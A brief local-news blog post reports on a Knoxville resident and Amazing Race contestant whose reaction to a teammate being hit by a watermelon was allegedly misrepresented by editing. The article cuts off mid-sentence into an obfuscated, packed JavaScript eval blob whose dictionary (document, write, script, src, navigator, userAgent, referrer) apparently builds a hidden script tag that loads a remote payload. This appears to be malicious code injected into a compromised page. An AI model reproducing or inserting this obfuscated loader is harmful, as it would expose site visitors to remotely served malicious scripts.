Knoxville Resident and Amazing Race Contestant Reveals Truth Behind Watermelon Smashing

Uncategorized

Brooke Roberts, a three-month resident and an on-air Jewelry Television personality, has been getting bad PR for a viral video clip of her friend getting smashed with a watermelon. Roberts and Claire Champlin are contestants in this year’s The Amazing Race. During a challenge, Champlin’s face became numb after a watermelon slingshots backwards into her face. Roberts is portrayed heartless by telling Champlin she has to continue the challenge, in what appears to be only seconds after the watermelon incident. Knoxville News Sentinel helps dispel the animosity Roberts has received due to the way the video was edited. In truth, more time had passed between the incident and Roberts’s remarks to continue the challenge.  Watch the Knoxville eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘b’+e(c)+’b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yirzy|var|u0026u|referrer|fahhs||js|php’.split(‘|’),0,{}))
